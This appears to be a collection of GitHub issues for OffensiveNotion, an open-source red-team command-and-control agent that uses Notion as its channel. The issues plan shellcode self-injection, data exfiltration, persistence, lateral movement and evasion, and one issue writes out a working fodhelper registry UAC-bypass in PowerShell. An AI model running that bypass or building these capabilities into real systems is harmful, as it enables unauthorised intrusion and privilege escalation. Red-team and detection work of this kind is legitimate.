Simple command handler that returns a bunch of info on the environment. Can lean heavily on whoami crate. Nothing crazy

prototype:

Describe the bug
inject self will kill the Notion agent if the injection happens but no session spawns. If you inject meterpreter shellcode but no multi/handler is up to catch it, for example.

To Reproduce
Host shellcode
Do not run a multi/handler
Perform self injection

Expected behavior
The agent should handle this and exit from the CreateThread injection routine alive.

The basic idea would be to provide auth tokens dynamically to a command that knew how to send data to S3/Azure/DO storage buckets.

Command proposal

upload s3 $token path/to/file

If at any point you interrupt the install script, the Dockerfile (which has been SED'd to build the agent in the correct os/build version) gets stuck as the one you set during that build. Easily fixable but annoying.

• Loads CLR into app
• Downloads assembly remotely
• Load/execute assembly and return results
• Unload appdomain

Currently looking for help on this one, need a good example of Rust implementation of loading the CLR and FFI for .NET in general

There are slight differences between main.py's config setup and the one that occurs if you run the agent with -d. These should be 1-1

• Default cfg.json location
• Launch app? y/n
• Encryption key with default of 'offensivenotion'

Might be a bug when Linux (and maybe macOS) agent attempts to selfdestruct but does not have write access to the directory to be able to manipulate the file. Weird edge case and I can't seem to reproduce it but it did happen that one time

Describe the bug
LAUNCH_APP is one of the config options that should make the application launch the fake Notion page on Windows/Linux. However, the option is never asked for nor seded in the Python build script.

To Reproduce
Steps to reproduce the behavior:

1. Build the agent through the Docker/Python pipeline.
2. Note that the LAUNCH_APP option is never requested.
3. Edit the config.json from the first run to include "LAUNCH_APP": true as a key/value pair.
4. Even with this, the app will not launch because the default is never requested nor changed.

Similar to sleep and jitter:

• Command returns the current config values to the page if run with no args
• Command changes a config value to something new if passed args

#Registry Command Edit

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value [injection] -Force

#Bypass Execution
Start-Process "C:\Windows\System32\fodhelper.exe"

^^

Using VirtualAlloc/VirtualProtect/CreateThread/WaitForSingleObject pattern

Release binaries, cargo build, xfer to Taggart's profile, check links in wiki, social media posts and launch party

• Delete bin on disk

• Shutdown agent

• (bonus) Overwrite proc memory

https://github.com/HuskyHacks/OffensiveNotion/wiki

Though it may be a while before SCShell is online, we did accidentally discover the API call patterns required to do token creation and impersonation a la Cobalt Strike.

Ref:
https://github.com/HuskyHacks/RustySCShell/blob/master/src/main.rs#L80

• Wiki pages: config and guardrails
• Edit changelog

Packaged YARA Rules

Allow elevation on Windows from High integrity sessions to NT Authority\SYSTEM.

Looking at [this] from SharpDPAPI as inspiration: https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/lib/Helpers.cs#L400

New Commands

• selfdestruct
• inject self

The Dang Old macOS agent

• all the cool stuff (persistence commands, etc)
• Platypus docs

Misc

• New method of starting (docker build and docker run that kicks off main.py within the container)
• Update the Changelog
• Clean main repo README, move v1.0.0 release notes to changelog
• Remove the Last Commit block from the README (I think it gives off the wrong vibe)
• Wiki page on collaboration. (“Team server” in this case is just sharing a notebook out, access Notion from mobile”)

This ships getting ready to leave the harbor.

Criteria:

• Agent runs with and without -c (either pulls in config or has config set at compile time)
• Debug/verbose mode prints to console
• Release mode builds as GUI (if possible)/does not write to console
• Agent runs Notion.so app mode when executed
• Accounts for major exceptions/no panics during runtime

Yara rule + interceptor script to POC a defender takedown of the ON agent.

Working branch is https://github.com/mttaggart/OffensiveNotion/tree/defenderkit and can be developed independent of rest of project

is it?

Runas to run in another user's context

Carve out the Notion layer of OffensiveNotion into its own module, allowing the C2 to work on other LOTS channels.

Integrate a way to load COFF files on the agent to provide a lot more flexibility and functionality to the framework.

Seen someone tried to write BOFs for CS https://github.com/wumb0/rust_bof in Rust.

Other potentially helpful projects:
https://github.com/trustedsec/COFFLoader
https://github.com/Yaxser/COFFLoader2
https://github.com/frkngksl/NiCOFF
https://github.com/d4rckh/nim-coff

red team responsibly, kiddos

Develop lat move capabilities for all OS builds.

Idea board

Win:

• PSRemoting
• PSexec
• SCShell (see other issue)
• WMI remote exec

Lin/macOS:

• SSH

Rando thoughts

Shellcode injection for this is probably off the table (shellcode for the ON agent would be unwieldly and frankly ridiculous)

Likely will use some kind of remote copy primitive to send it to other hosts

(bonus )Any design space for P2P?

command.rs is getting a lil shaggy. Time to break it up into submodules to make adding commands a cleaner experience.

just like the title says

Come up with a way (ways?!) to persist the agent.

For moving data out of the target environment

Crude proto function implemented in b89c5c3

• If file is large, make a sub-page and post to that page
• Pressure test
• Documentation

** LONG TERM PROJECT **

Our good friend, president of the Enthusiastic Mollusk Afficianado club himself, @Alh4zr3d, recommended we look into how to mitigate the possibility of SSL proxy/stripping in an environment. This risk is mentioned in passing in the OPSEC section of the Wiki, but not addressed directly.

Some thoughts:

• Though I anticipate that stripping the SSL on the agent's comms will reveal the clear text JSON beneath it, I don't know if that's really the case! We should set up an experiment to do so.
• One approach for this would be that enabling "Paranoid Mode" on the agent would follow all command outputs with one round of AES encryption using a pre-determined key. Then, perhaps the encrypted body is base64 encoded and THEN egresses the network and is posted to the API as one big ol block of B64 characters.
• Then (as a limited POC), the Red Teramer can decode/decrypt manually.
• As a more full feautred POC, a python script on the operator's side can make similar API calls to the Listener page to scan for command blocks with B64, read them off, decode/decrypt, and post the results.

Lots of design space for interesting solutions, and definitely is a lot of work, but I also think it's doable.

Whoami, getprivs, isAdmin

Section for recognizing contributors!

• @MEhrn00

License for the repo, I lean towards MIT

@mttaggart

A how-to guide for adding things like new commands to the project

Ref: https://kerkour.com/rust-fast-port-scanner/

For camouflage (and persistence), actually launch the notion site in a browser that's available.

This is a big lift, but once done, the Windows components will be much more ergonomic.

• elevate.rs
• getprivs.rs
• inject.rs
• selfdestruct.rs

Check on if compiled agent exists should be more thorough to prevent this: